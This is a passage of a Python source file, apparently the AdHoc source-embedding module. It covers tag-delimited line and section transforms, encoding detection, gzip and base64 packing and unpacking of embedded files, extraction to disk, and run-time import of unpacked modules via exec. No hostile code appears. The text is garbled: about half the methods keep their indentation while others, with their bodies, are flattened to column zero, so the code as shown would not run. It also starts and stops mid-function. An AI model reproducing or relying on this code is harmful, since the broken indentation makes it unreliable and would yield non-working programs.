>>> AdHoc.adhoc_parse_line(tagged_line, strip_comment=True)
('adhoc_test', 'arg1 arg2')
>>> AdHoc.adhoc_parse_line(tagged_line.replace('@', '<'))
('', '# <:adhoc_test:< arg1 arg2 # comment')
>>> AdHoc.adhoc_parse_line(tagged_line.replace('@', '|'), delimiters=('|:', ':|'))
('adhoc_test', 'arg1 arg2 # comment')
"""
# @:adhoc_run_time_section:@ on
if delimiters is None:
delimiters = cls.line_delimiters
if symbol_or_re is None:
dlm = delimiters[1]
if dlm:
symbol_or_re = ''.join(('[^', dlm[0], ']+'))
else:
symbol_or_re = ''.join(('[^\\s]+'))
is_re = True
if not is_re:
symbol_or_re = re.escape(symbol_or_re)
tag_rx = cls.adhoc_tag(''.join(('(', symbol_or_re, ')')), delimiters, is_re=True)
mo = re.search(tag_rx, tagged_line)
if mo:
ptag = mo.group(1)
else:
ptag = ''
strip_rx = ''.join(('^.*', tag_rx, '\\s*'))
tag_arg = re.sub(strip_rx, '', tagged_line).strip()
if strip_comment:
tag_arg = re.sub('\\s*#.*', '', tag_arg)
return (ptag, tag_arg)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Low-Level Convenience Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
    @classmethod
    def set_delimiters(cls, line_delimiters=None, section_delimiters=None): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''Set line/section delimiters.
        :returns: saved delimiter state suitable for
          :meth:`reset_delimiters`.
        :param line_delimiters: the line delimiters. If None, line
          delimiters are not changed.
        :param section_delimiters: the section delimiters. If None,
          `line_delimiters` is used.
        If both `line_delimiters` and `section_delimiters` are None,
        the delimiter state is returned without any modification to
        the current delimiters.
        >>> AdHoc.set_delimiters()
        (('@:', ':@'), ('@:', ':@'))
        >>> sv = AdHoc.inc_delimiters()
        >>> sv
        (('@:', ':@'), ('@:', ':@'))
        >>> AdHoc.set_delimiters()
        (('@@:', ':@@'), ('@@:', ':@@'))
        >>> AdHoc.reset_delimiters(sv)
        >>> AdHoc.set_delimiters()
        (('@:', ':@'), ('@:', ':@'))
        >>> AdHoc.set_delimiters(('<:', ':>'))
        (('@:', ':@'), ('@:', ':@'))
        >>> AdHoc.set_delimiters()
        (('<:', ':>'), ('<:', ':>'))
        >>> AdHoc.reset_delimiters(sv)
        >>> AdHoc.set_delimiters()
        (('@:', ':@'), ('@:', ':@'))
        '''
        # @:adhoc_run_time_section:@ on
        # Capture the current state first, so callers can always
        # restore it later via reset_delimiters().
        delimiter_state = (cls.line_delimiters, cls.section_delimiters)
        if line_delimiters is None:
            line_delimiters = delimiter_state[0]
            if section_delimiters is None:
                section_delimiters = delimiter_state[1]
        elif section_delimiters is None:
            # Only line delimiters given: use them for sections, too.
            section_delimiters = line_delimiters
        cls.line_delimiters, cls.section_delimiters = (
            line_delimiters, section_delimiters)
        return delimiter_state
@classmethod
def reset_delimiters(cls, delimiter_state): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Reset line/section delimiters from saved state.
:param delimiter_state: delimiter state as returned by
:meth:`set_delimiters`.
'''
# @:adhoc_run_time_section:@ on
cls.line_delimiters, cls.section_delimiters = delimiter_state
@classmethod
def inc_delimiters(cls): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Duplicate outer delimiter characters.
:returns: saved delimiter state suitable for
:meth:`reset_delimiters`.
E.g.::
"@:", ":@" => "@@:", ":@@"
See :meth:`set_delimiters` for doctest example.
'''
# @:adhoc_run_time_section:@ on
inc_first = lambda dlm: (((not dlm) and ('')) or (dlm[0] + dlm))
inc_last = lambda dlm: (((not dlm) and ('')) or (dlm + dlm[-1]))
outer_delimiters = [(inc_first(dlm[0]), inc_last(dlm[1]))
for dlm in (cls.line_delimiters,
cls.section_delimiters)]
return cls.set_delimiters(*outer_delimiters)
@classmethod
def line_tag(cls, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Make a line tag from symbol or regular expression.
:returns: unicode string.
:param symbol_or_re: symbol string or regular expresssion.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
return cls.adhoc_tag(symbol_or_re, cls.line_delimiters, is_re)
@classmethod
def section_tag(cls, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Make a section tag from symbol or regular expression.
:returns: unicode string.
:param symbol_or_re: symbol string or regular expresssion.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
return cls.adhoc_tag(symbol_or_re, cls.section_delimiters, is_re)
@classmethod
def tag_lines(cls, string, tag, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Get lines matching tag.
:returns: list of tag lines.
See :meth:`tag_split`.
"""
# @:adhoc_run_time_section:@ on
result = []
for section in cls.tag_split(string, tag, is_re):
if section[0]:
result.append(section[1])
return result
@classmethod
def tag_partition(cls, string, tag, is_re=False, headline=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Split the string into body parts and sections.
If `headline` is True, the starting tag line is included for
sections.'''
# @:adhoc_run_time_section:@ on
in_section = False
body_parts = []
sections = []
tagged_line = ''
for section in cls.tag_split(string, tag, is_re):
if section[0]:
in_section = not in_section
tagged_line = section[1]
continue
if in_section:
if headline:
sections.append((tagged_line, section[1]))
else:
sections.append(section[1])
else:
body_parts.append(section[1])
return body_parts, sections
@classmethod
def tag_sections(cls, string, tag, is_re=False, headline=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Split the string into sections.
If `headline` is True, the starting tag line is included.
See :meth:`tag_partition`.
'''
# @:adhoc_run_time_section:@ on
body_parts, sections = cls.tag_partition(string, tag, is_re, headline)
return sections
@classmethod
def line_tag_parse(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a line tag line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.adhoc_parse_line(tagged_line, symbol_or_re, cls.line_delimiters,
is_re, strip_comment=strip_comment)
@classmethod
def line_tag_strip(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Remove tag and optionally comment from line tag line.
:returns: tag arguments.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.line_tag_parse(tagged_line, symbol_or_re, is_re, strip_comment)[1]
@classmethod
def section_tag_parse(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a section tag line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.adhoc_parse_line(tagged_line, symbol_or_re, cls.section_delimiters,
is_re, strip_comment=strip_comment)
@classmethod
def section_tag_strip(cls, tagged_line, symbol_or_re=None, is_re=False, # |:clm:|
strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Remove tag and optionally comment from section tag line.
:returns: tag arguments.
See :meth:`adhoc_parse_line`.
"""
# @:adhoc_run_time_section:@ on
return cls.section_tag_parse(tagged_line, symbol_or_re, is_re, strip_comment)[1]
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Tagged Line/Section Transformations
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def transform_lines(cls, transform, string, # |:clm:|
symbol_or_re, is_re=False, delimiters=None):
# @:adhoc_run_time_section:@ off
"""Split string into line tag lines and other sections; call
transform callback on each tagged line.
:returns: transformed string.
:param transform: callback which receives argument ``tagged-line``.
"""
# @:adhoc_run_time_section:@ on
if delimiters is None:
delimiters = cls.line_delimiters
result = []
in_section = False
for section in cls.tag_split(
string, cls.adhoc_tag(symbol_or_re, delimiters, is_re), is_re):
blob = section[1]
if section[0]:
in_section = not in_section
blob = transform(blob)
result.append(blob)
string = ''.join(result)
return string
    @classmethod
    def transform_sections(cls, transform, string, # |:clm:|
                           symbol_or_re, is_re=False):
        # @:adhoc_run_time_section:@ off
        """Split string into sections and call transform callback on each section.
        :returns: transformed string.
        :param transform: callback which receives and returns
          arguments ``section``, ``headline``.
        """
        # @:adhoc_run_time_section:@ on
        result = []
        in_section = False
        headline = ''
        # tag_split alternates tag lines and payload chunks. The
        # opening tag line is buffered in `headline` (and not emitted
        # yet) so the callback may rewrite it; it is appended right
        # before the transformed section body. Closing tag lines fall
        # through and are emitted unchanged.
        for section in cls.tag_split(
                string, cls.section_tag(symbol_or_re, is_re), is_re):
            blob = section[1]
            if section[0]:
                in_section = not in_section
                if in_section:
                    headline = blob
                    continue
            elif in_section:
                blob, headline = transform(blob, headline)
                result.append(headline)
            result.append(blob)
        string = ''.join(result)
        return string
@classmethod
def line_tag_rename(cls, string, symbol_or_re, renamed, is_re=False, delimiters=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Rename tag-symbol.
Default tag delimiters are :attr:`line_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
.. >>> printf(str(AdHoc.line_tag_rename(tpl, "adhoc_run_time_section", "should_be_kept")))
'''
# @:adhoc_run_time_section:@ on
if is_re:
transform = lambda blob: re.sub(symbol_or_re, renamed, blob)
else:
transform = lambda blob: blob.replace(symbol_or_re, renamed)
return cls.transform_lines(transform, string, symbol_or_re, is_re, delimiters)
@classmethod
def line_tag_remove(cls, string, symbol_or_re, is_re=False, delimiters=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove tagged lines.
Default tag delimiters are :attr:`line_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
.. >>> printf(str(AdHoc.line_tag_remove(tpl, "adhoc_run_time_section")))
'''
# @:adhoc_run_time_section:@ on
transform = lambda blob: ''
return cls.transform_lines(transform, string, symbol_or_re, is_re, delimiters)
@classmethod
def section_tag_rename(cls, string, symbol_or_re, renamed, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Rename tag-symbol of lines tagged with :attr:`section_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
>>> res = AdHoc.section_tag_rename(tpl, "adhoc_run_time_section", "should_be_kept")
>>> res = '\\n'.join(res.splitlines()[:4])
>>> printf(str(res)) #doctest: +ELLIPSIS
# @:should_be_kept:@ on
@classmethod
def col_param_closure(cls):...
# @:should_be_kept:@ off
'''
# @:adhoc_run_time_section:@ on
if is_re:
transform = lambda blob: re.sub(symbol_or_re, renamed, blob)
else:
transform = lambda blob: blob.replace(symbol_or_re, renamed)
return cls.transform_lines(transform, string, symbol_or_re, is_re, cls.section_delimiters)
@classmethod
def section_tag_remove(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove lines tagged with :attr:`section_delimiters`.
>>> tpl = AdHoc.get_named_template("col-param-closure")
>>> res = AdHoc.section_tag_remove(tpl, "adhoc_run_time_section")
>>> res = '\\n'.join(res.splitlines()[:4])
>>> printf(str(res)) #doctest: +ELLIPSIS
@classmethod
def col_param_closure(cls):...
...Closure for setting up maximum width, padding and separator
for table columns.
'''
# @:adhoc_run_time_section:@ on
transform = lambda blob: ''
return cls.transform_lines(transform, string, symbol_or_re, is_re, cls.section_delimiters)
    @classmethod
    def indent_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''
        >>> section = """\\
        ... # prefix
        ...     # @:adhoc_indent_check:@ +4
        ...     #line 1
        ...     # line 2
        ...     #
        ...     # line 3
        ...     # @:adhoc_indent_check:@
        ... # suffix\\
        ... """
        >>> printf(AdHoc.indent_sections(section, "adhoc_indent_check"))
        # prefix
            # @:adhoc_indent_check:@ +4
                #line 1
                # line 2
                #
                # line 3
            # @:adhoc_indent_check:@
        # suffix
        >>> printf(AdHoc.indent_sections(section.replace("+4", "-1"),
        ...     "adhoc_indent_check"))
        # prefix
            # @:adhoc_indent_check:@ -1
           #line 1
           # line 2
           #
           # line 3
            # @:adhoc_indent_check:@
        # suffix
        '''
        # @:adhoc_run_time_section:@ on
        result = []
        in_section = False
        indent = 0
        for section in cls.tag_split(
                string, cls.section_tag(symbol_or_re, is_re), is_re):
            blob = section[1]
            if section[0]:
                in_section = not in_section
                if in_section:
                    # The opening tag line may carry the indent amount
                    # as its argument (e.g. "+4" or "-1"); without an
                    # argument the default is to dedent by 4.
                    tag_arg = cls.section_tag_strip(blob)
                    if tag_arg:
                        indent = int(tag_arg)
                    else:
                        indent = -4
            else:
                if in_section and indent:
                    if indent < 0:
                        # Negative indent: strip that many leading
                        # spaces from every line of the section.
                        rx = re.compile(''.join(('^', ' ' * (-indent))), re.M)
                        blob = rx.sub('', blob)
                    elif indent > 0:
                        # Positive indent: prefix every line with the
                        # requested number of spaces.
                        rx = re.compile('^', re.M)
                        blob = rx.sub(' ' * indent, blob)
                    indent = 0
            result.append(blob)
        string = ''.join(result)
        return string
@classmethod
def enable_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
>>> section = """\\
... # prefix
... # @:adhoc_enable_check:@
... #line 1
... # line 2
... #
... # line 3
... # @:adhoc_enable_check:@
... # suffix\\
... """
>>> printf(AdHoc.enable_sections(section, "adhoc_enable_check"))
# prefix
# @:adhoc_enable_check:@
line 1
line 2
<BLANKLINE>
line 3
# @:adhoc_enable_check:@
# suffix
'''
# @:adhoc_run_time_section:@ on
enable_ro = re.compile('^([ \t\r]*)(# ?)', re.M)
enable_sub = '\\1'
transform = lambda blob, hl: (enable_ro.sub(enable_sub, blob), hl)
return cls.transform_sections(transform, string, symbol_or_re, is_re)
adhoc_rx_tab_check = re.compile('^([ ]*\t)', re.M)
adhoc_rx_disable_simple = re.compile('^', re.M)
adhoc_rx_min_indent_check = re.compile('^([ ]*)([^ \t\r\n]|$)', re.M)
    @classmethod
    def disable_transform(cls, section, headline=None): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''Disable section transform callback.
        Comments out every line of `section`, inserting ``# `` after
        the common minimum indentation; blank lines stay blank.
        '''
        # @:adhoc_run_time_section:@ on
        if not section:
            return (section, headline)
        if cls.adhoc_rx_tab_check.search(section):
            # tabs are evil
            if cls.verbose:
                list(map(sys.stderr.write,
                         ('# dt: evil tabs: ', repr(section), '\n')))
            # Fall back to commenting at column zero for the whole
            # section, since mixed tabs/spaces make indent analysis
            # unreliable.
            return (
                cls.adhoc_rx_disable_simple.sub(
                    '# ', section.rstrip()) + '\n',
                headline)
        min_indent = ''
        # Find the smallest non-empty indentation; a non-blank line at
        # column zero forces the minimum indent to ''.
        for mo in cls.adhoc_rx_min_indent_check.finditer(section):
            indent = mo.group(1)
            if indent:
                if (not min_indent or len(min_indent) > len(indent)):
                    min_indent = indent
            elif mo.group(2):
                min_indent = ''
                break
        adhoc_rx_min_indent = re.compile(
            ''.join(('^(', min_indent, '|)([^\n]*)$')), re.M)
        if section.endswith('\n'):
            section = section[:-1]
        dsection = []
        for mo in adhoc_rx_min_indent.finditer(section):
            indent = mo.group(1)
            rest = mo.group(2)
            if not indent and not rest:
                #leave blank lines blank
                dsection.append('\n')
            else:
                # Insert the comment marker after the common indent.
                dsection.extend((indent, '# ', rest, '\n'))
        return (''.join(dsection), headline)
@classmethod
def disable_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
>>> section = """\\
... prefix
... @:adhoc_disable_check:@
... line 1
... line 2
...
... line 3
... @:adhoc_disable_check:@
... suffix\\
... """
>>> printf(AdHoc.disable_sections(section, "adhoc_disable_check"))
prefix
@:adhoc_disable_check:@
# line 1
# line 2
<BLANKLINE>
# line 3
@:adhoc_disable_check:@
suffix
'''
# @:adhoc_run_time_section:@ on
return cls.transform_sections(
cls.disable_transform, string, symbol_or_re, is_re)
@classmethod
def remove_sections(cls, string, symbol_or_re, is_re=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Remove sections.'''
# @:adhoc_run_time_section:@ on
ah_retained, ah_removed = cls.tag_partition(
string, cls.section_tag(symbol_or_re, is_re), is_re)
return ''.join(ah_retained)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| IO Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@staticmethod
def check_coding(source): # |:fnc:|
# @:adhoc_run_time_section:@ off
'''Determine coding for source.
:returns: coding type for string.
:param source: source string/unicode.
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is returned.
'''
# @:adhoc_run_time_section:@ on
if source:
eol_seen = 0
for c in source:
if isinstance(c, int):
lt_ = lambda a, b: a < b
chr_ = lambda a: chr(a)
else:
lt_ = lambda a, b: True
chr_ = lambda a: a
break
check = []
for c in source:
if lt_(c, 127):
check.append(chr_(c))
if c == '\n':
eol_seen += 1
if eol_seen == 2:
break
check = ''.join(check)
mo = re.search('-[*]-.*coding:\\s*([^;\\s]+).*-[*]-', check)
else:
mo = None
if mo:
coding = mo.group(1)
else:
coding = 'utf-8'
return coding
@classmethod
def decode_source(cls, source): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Decode source to unicode.
:param source: source string (may already be unicode).
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is applied.
'''
# @:adhoc_run_time_section:@ on
if not source:
return cls.uc('')
if not isinstance(source, cls.uc_type) and hasattr(source, 'decode'):
source = source.decode(cls.check_coding(source))
return source
@classmethod
def encode_source(cls, source): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Encode source from unicode.
:param source: source string (may already be encoded).
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is applied.
'''
# @:adhoc_run_time_section:@ on
if not source:
return ''.encode('utf-8')
if isinstance(source, cls.uc_type) and hasattr(source, 'encode'):
source = source.encode(cls.check_coding(source))
return source
    @classmethod
    def read_source(cls, file_, decode=True): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''Read source from file.
        :returns: unicode string.
        :param file_: If None, empty or ``-``, sys.stdin is used,
          otherwise the file is read from ``file_`` and decoded with
          :meth:`decode_source`.
        :param decode: if False, the raw (byte) contents are returned
          without decoding.
        '''
        # @:adhoc_run_time_section:@ on
        source = None
        if not file_ or file_ == '-':
            # Python3 has a buffer attribute for binary input.
            if hasattr(sys.stdin, 'buffer'):
                source = sys.stdin.buffer.read()
            else:
                source = sys.stdin.read()
        else:
            try:
                sf = open(file_, 'rb')
                source = sf.read()
                sf.close()
            except IOError:
                # Fallback: if the file cannot be read from disk, look
                # for an already-loaded module whose __file__ matches
                # and reuse the adhoc source attached to it.
                for module in sys.modules.values():
                    if (module
                        and hasattr(module, '__file__')
                        and module.__file__ == file_):
                        if (hasattr(module, '__adhoc__')
                            and hasattr(module.__adhoc__, 'source')):
                            source = module.__adhoc__.source
                            break
                if source is None:
                    raise IOError('source not found for `' + str(file_) + '`')
        if decode:
            return cls.decode_source(source)
        return source
@classmethod
def write_source(cls, file_, source, mtime=None, mode=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Write source to file.
:param file_: If None, empty or ``-``, sys.stdout is used,
otherwise the file is written to ``file_`` after encoding
with :meth:`encode_source`.
'''
# @:adhoc_run_time_section:@ on
esource = cls.encode_source(source)
if not file_ or file_ == '-':
# @:adhoc_run_time_section:@ off
# For Python2, sys.stdout is effectively binary, so source
# can be pre-encoded.
#
# With Python3 sys.stdout does automatic encoding (which
# is unwanted).
# Normal sys.stdout has a buffer member which allows
# binary output, but not during doctest.
# @:adhoc_run_time_section:@ on
if hasattr(sys.stdout, 'buffer'):
sys.stdout.buffer.write(esource)
else:
try:
sys.stdout.write(esource)
except TypeError:
sys.stdout.write(source)
else:
sf = open(file_, 'wb')
sf.write(esource)
sf.close()
if mode is not None:
os.chmod(file_, mode)
if mtime is not None:
import datetime
if cls.isstring(mtime):
try:
date, ms = mtime.split('.')
except ValueError:
date = mtime
ms = 0
mtime = cls.strptime(date, '%Y-%m-%dT%H:%M:%S')
mtime += datetime.timedelta(microseconds=int(ms))
if isinstance(mtime, datetime.datetime):
# @:adhoc_run_time_section:@ off
# import calendar
# if mtime.utcoffset() is not None:
# mtime = mtime - mtime.utcoffset()
# millis = int(calendar.timegm(mtime.timetuple()) * 1000 +
# mtime.microsecond / 1000)
# ts = float(millis) / 1000
# @:adhoc_run_time_section:@ on
ts = int(mtime.strftime("%s"))
else:
ts = mtime
os.utime(file_, (ts, ts))
    @classmethod
    def check_xfile(cls, file_, xdir=None): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''Prepare extraction of a file.
        :returns: None, if the file already exists. Otherwise, the
          file directory is created and the absolute path name of the
          file is returned.
        :param file_: filename.
        :param xdir: extraction directory. If it is `None`,
          :attr:`extract_dir` is used.
        If ``file_`` is `None`, empty or ``-``, the filename ``-`` is
        returned.
        If ``file_`` starts with a slash ``/``, ``xdir`` is ignored,
        otherwise, ``xdir`` is prepended to ``file_``.
        '''
        # @:adhoc_run_time_section:@ on
        if xdir is None:
            xdir = cls.extract_dir
        if not file_:
            file_ = '-'
        if file_ == '-':
            # stdout pseudo-file: nothing to create, never "exists".
            return file_
        file_ = os.path.expanduser(file_)
        if os.path.isabs(file_):
            xfile = file_
        else:
            xfile = os.path.join(xdir, file_)
        xfile = os.path.abspath(xfile)
        if os.path.exists(xfile):
            # do not overwrite files
            if (cls.extract_warn or (cls.verbose)) and not cls.quiet:
                list(map(sys.stderr.write, (
                    "# xf: ", cls.__name__, ": warning file `", file_,
                    "` exists. skipping ...\n")))
            return None
        # Create the (possibly nested) target directory on demand.
        xdir = os.path.dirname(xfile)
        if not os.path.exists(xdir):
            os.makedirs(xdir)
        return xfile
@classmethod
def pack_file(cls, source, zipped=True): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Optionally gzip a file and base64-encode it.
:returns: base64-encoded unicode string.
:param source: string to be packed.
:param zipped: if True, gzip ``source`` before
base64-encoding. (Default: True).
'''
# @:adhoc_run_time_section:@ on
import base64, gzip
if zipped:
sio = _AdHocBytesIO()
gzf = gzip.GzipFile('', 'wb', 9, sio)
gzf.write(cls.encode_source(source))
gzf.close()
source = sio.getvalue()
sio.close()
else:
source = cls.encode_source(source)
source = base64.b64encode(source)
source = source.decode('ascii')
return source
    @classmethod
    def unpack_file(cls, source64, zipped=True, decode=True): # |:clm:|
        # @:adhoc_run_time_section:@ off
        '''Base64-decode a file and optionally ungzip it.
        :returns: unicode string if ``decode`` is True.
        :param source64: base64 encoded unicode string to be unpacked.
        :param zipped: if True, ungzip ``source`` after
          base64-decoding. (Default: True).
        :param decode: if True, decode the result to unicode with
          :meth:`decode_source`; otherwise return raw bytes.
        '''
        # @:adhoc_run_time_section:@ on
        import base64, gzip
        # @:adhoc_run_time_section:@ off
        if cls.debug:
            printf(sformat(
                "{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[ {7}",
                dbg_comm, dbg_twid, dbg_fwid,
                ':DBG:', 'source64', len(source64), source64[:80],
                'b64decode ...'))
        # @:adhoc_run_time_section:@ on
        source = source64.encode('ascii')
        source = base64.b64decode(source)
        if zipped:
            # @:adhoc_run_time_section:@ off
            if cls.debug:
                printf(sformat(
                    "{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[ {7}",
                    dbg_comm, dbg_twid, dbg_fwid,
                    ':DBG:', 'source (zip)', len(source), repr(source)[:80],
                    'unzipping ...'))
            # @:adhoc_run_time_section:@ on
            # Decompress from an in-memory buffer.
            sio = _AdHocBytesIO(source)
            gzf = gzip.GzipFile('', 'rb', 9, sio)
            source = gzf.read()
            gzf.close()
            sio.close()
        if decode:
            source = cls.decode_source(source)
        # @:adhoc_run_time_section:@ off
        if cls.debug:
            printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[",
                           dbg_comm, dbg_twid, dbg_fwid,
                           ':DBG:', 'source', len(source), repr(source)[:80]))
        # @:adhoc_run_time_section:@ on
        return source
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Run-Time Unpack/Import Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def unpack_(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
# @:adhoc_run_time_section:@ off
"""Unpack adhoc'ed file, if it does not exist."""
# @:adhoc_run_time_section:@ on
xfile = cls.check_xfile(file_, cls.extract_dir)
if xfile is None:
return
if cls.verbose:
list(map(sys.stderr.write,
("# xf: ", cls.__name__, ": unpacking `", file_, "`\n")))
source = cls.unpack_file(source64, zipped=zipped, decode=False)
cls.write_source(xfile, source, mtime, mode)
@classmethod
def strptime(cls, date_string, format_): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Python 2.4 compatible"""
# @:adhoc_run_time_section:@ on
import datetime
if hasattr(datetime.datetime, 'strptime'):
strptime_ = datetime.datetime.strptime
else:
import time
strptime_ = lambda date_string, format_: (
datetime.datetime(*(time.strptime(date_string, format_)[0:6])))
return strptime_(date_string, format_)
    @classmethod
    def import_(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
                mode=None, zipped=True, flat=None, source64=None):
        # @:adhoc_run_time_section:@ off
        """Import adhoc'ed module from its packed ``source64`` payload."""
        # @:adhoc_run_time_section:@ on
        import datetime
        import time
        # Ensure the module object (and its __adhoc__ record) exists.
        module = cls.module_setup(mod_name)
        if mtime is None:
            mtime = datetime.datetime.fromtimestamp(0)
        else:
            # mtime=2011-11-23T18:04:26[.218506], zipped=True, flat=None, source64=
            try:
                date, ms = mtime.split('.')
            except ValueError:
                date = mtime
                ms = 0
            mtime = cls.strptime(date, '%Y-%m-%dT%H:%M:%S')
            mtime += datetime.timedelta(microseconds=int(ms))
        source = cls.unpack_file(source64, zipped=zipped, decode=False)
        # @:adhoc_run_time_section:@ off
        # |:todo:| add to parent module
        # @:adhoc_run_time_section:@ on
        mod_parts = mod_name.split('.')
        mod_child = mod_parts[-1]
        parent = '.'.join(mod_parts[:-1])
        # @:adhoc_run_time_section:@ off
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'parent', parent))
        # @:adhoc_run_time_section:@ on
        old_mtime = module.__adhoc__.mtime
        module = cls.module_setup(mod_name, file_, mtime, source, mode)
        if len(parent) > 0:
            # Attach the child module as an attribute of its parent
            # package, as a regular import would.
            setattr(sys.modules[parent], mod_child, module)
        if module.__adhoc__.mtime != old_mtime:
            # @:adhoc_run_time_section:@ off
            printf(sformat('{0}Executing source', dbg_comm))
            # @:adhoc_run_time_section:@ on
            # Module source is newer than what was loaded: (re-)execute
            # it in the module's namespace.
            source = cls.encode_source(module.__adhoc__.source)
            exec(source, module.__dict__)
        # @:adhoc_run_time_section:@ off
        msg = (((mod_name in sys.modules) and ('YES')) or ('NO'))
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       mod_name + ' imported', msg))
        module_name = module.__name__
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'module_name', module_name))
        dump_attr(module, wid=80, trunc=5)
        # @:adhoc_run_time_section:@ on
    @classmethod
    def module_setup(cls, module=None, file_=None, mtime=None, # |:clm:||:api_fi:|
                     source=None, mode=None):
        # @:adhoc_run_time_section:@ off
        '''Setup module for `AdHoc`.
        \\|:todo:| various modes are possible:
        - always use newest version (development) (currently implemented)
        - always use adhoc\'ed version (freeze) (not implemented)
        '''
        # @:adhoc_run_time_section:@ on
        m = 'ms: '
        class Attr: # |:cls:|
            pass
        import types, datetime, os
        # Resolve the `module` argument: accept a module object or a
        # (dotted) module name; create a fresh module if needed.
        if not isinstance(module, types.ModuleType):
            mod_name = module
            if mod_name is None:
                mod_name = __name__
            try:
                if mod_name not in sys.modules:
                    # @:adhoc_run_time_section:@ off
                    if cls.verbose:
                        printe(sformat('{0}{1}__import__({2})',
                                       dbg_comm, m, mod_name))
                    # @:adhoc_run_time_section:@ on
                    __import__(mod_name)
                module = sys.modules[mod_name]
            except (ImportError, KeyError):
                # @:adhoc_run_time_section:@ off
                if cls.verbose:
                    printe(sformat('{0}{1}imp.new_module({2})',
                                   dbg_comm, m, mod_name))
                # @:adhoc_run_time_section:@ on
                import imp
                module = imp.new_module(mod_name)
                sys.modules[mod_name] = module
        else:
            mod_name = module.__name__
        if mtime is None:
            if (file_ is not None
                or source is not None):
                # the info is marked as outdated
                mtime = datetime.datetime.fromtimestamp(1)
            else:
                # the info is marked as very outdated
                mtime = datetime.datetime.fromtimestamp(0)
        # Attach the __adhoc__ bookkeeping record (mtime/mode/source)
        # on first contact with this module.
        if not hasattr(module, '__adhoc__'):
            adhoc = Attr()
            setattr(module, '__adhoc__', adhoc)
            setattr(adhoc, '__module__', module)
            mtime_set = None
            mode_set = mode
            if hasattr(module, '__file__'):
                module_file = module.__file__
                if module_file.endswith('.pyc'):
                    module_file = module_file[:-1]
                if os.access(module_file, os.R_OK):
                    stat = os.stat(module_file)
                    mtime_set = datetime.datetime.fromtimestamp(
                        stat.st_mtime)
                    mode_set = stat.st_mode
            if mtime_set is None:
                # the info is marked as very outdated
                mtime_set = datetime.datetime.fromtimestamp(0)
            adhoc.mtime = mtime_set
            adhoc.mode = mode_set
        else:
            adhoc = module.__adhoc__
        # Prefer a newer file on disk over the recorded information.
        if (mtime > adhoc.mtime
            or not hasattr(module, '__file__')):
            if file_ is not None:
